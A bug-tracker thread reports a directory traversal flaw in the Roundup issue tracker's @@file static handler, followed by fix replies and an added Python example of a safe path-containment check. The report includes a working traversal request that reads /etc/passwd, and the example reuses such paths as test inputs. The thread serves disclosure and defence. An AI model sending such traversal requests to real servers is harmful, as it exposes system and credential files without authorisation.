Vickenty Fesunov
2004-05-27 04:51
random filesystem access
Roundup uses /home/@@file/ prefix to get static files
from the filesystem. It does not restrict in any way
the files that are handled.
I have a roundup tracker home at /home/kent/cit, then I
do the following:
kent@kent:~$ nc localhost 8080
GET /cit/@@file/../../../../etc/passwd HTTP/1.0
Host: kent
HTTP/1.0 200 OK
Server: BaseHTTP/0.3 Python/2.3.3
Date: Thu, 27 May 2004 11:47:04 GMT
Last-Modifed: Tue, 18 May 2004 14:00:15 GMT
Content-Length: 1088
Content-Type: text/plain
Pragma: no-cache
and my actual /etc/passwd follows.
Perhaps roundup web interface should restrict @@file
requests to some directory.
------------------------------------------------------------------------
Date: 2004-05-27 14:48
Sender: richard </users/richard/>
Logged In: YES
user_id=6405
Fixed, and I'll put up new releases for 0.6 and 0.7 ASAP.
Thanks for the report.
------------------------------------------------------------------------
Date: 2004-05-27 09:18
Sender: kent_turbo </users/kent_turbo/>
Logged In: YES
user_id=714555
I have attached a patch that fixes this bug. It uses
os.path.normpath to normalise the path, and then checks that
the file to be served resides under STATIC_FILES (new
variable in the config) path. config.py in the templates are
patched to include this new variable.
------------------------------------------------------------------------
Date: 2004-05-27 08:41
Sender: kent_turbo </users/kent_turbo/>
Logged In: YES
user_id=714555
I have attached a patch that fixes this bug. It uses
os.path.normpath to normalise the path, and then checks that
the file to be served resides under STATIC_FILES (new
variable in the config) path. config.py in the templates are
patched to include this new variable.
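Added illustration (not Roundup's code and not the patch attached to this thread): the vulnerable join described in the original report placed beside the containment check the fix comment describes, normalising with os.path.normpath and then requiring that the result stays under the static directory. The STATIC_FILES value below is a constructed example path, and the os.path.commonpath comparison is this example's choice for the "resides under" test; it is not taken from the attached patch.

```python
import os

# Constructed example value for the new STATIC_FILES config variable.
STATIC_FILES = "/home/kent/cit/html"


def unsafe_static_path(static_root, url_path):
    """Vulnerable variant: the @@file suffix is joined onto the static
    directory with no normalisation and no containment check, so a
    suffix such as '../../../../etc/passwd' walks out of the directory."""
    return os.path.join(static_root, url_path)


def safe_static_path(static_root, url_path):
    """Hardened variant following the fix described in the thread.

    Returns the absolute filesystem path to serve, or None when the
    request must be refused. Steps: normalise the joined path, then
    require that it lies inside static_root."""
    root = os.path.normpath(os.path.abspath(static_root))

    # An absolute client path would make os.path.join discard root
    # entirely; NUL bytes would truncate the path at the C level.
    if url_path.startswith("/") or "\0" in url_path:
        return None

    candidate = os.path.normpath(os.path.join(root, url_path))

    # commonpath compares whole path components, so '/x/html2' is not
    # mistaken for living inside '/x/html' (a plain str.startswith
    # prefix check would accept it). ValueError is raised for paths on
    # different drives (Windows); treat that as outside the root too.
    try:
        if os.path.commonpath([root, candidate]) != root:
            return None
    except ValueError:
        return None
    return candidate


def classify_requests(static_root, suffixes):
    """Evaluate a batch of @@file suffixes and report, per suffix,
    whether the hardened resolver would serve or refuse it. Useful as a
    regression check when auditing a static-file handler."""
    return {
        suffix: ("serve" if safe_static_path(static_root, suffix) else "refuse")
        for suffix in suffixes
    }


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, three traversal attempts.
    samples = ["style.css", "css/../style.css",
               "../../../../etc/passwd", "/etc/passwd"]
    for suffix, verdict in classify_requests(STATIC_FILES, samples).items():
        print(f"{verdict:7} {suffix!r} -> "
              f"unsafe={unsafe_static_path(STATIC_FILES, suffix)!r} "
              f"safe={safe_static_path(STATIC_FILES, suffix)!r}")
```

Note that normpath only collapses '.' and '..' textually; if the static directory may contain symlinks pointing elsewhere, resolving with os.path.realpath before the containment check closes that second route as well.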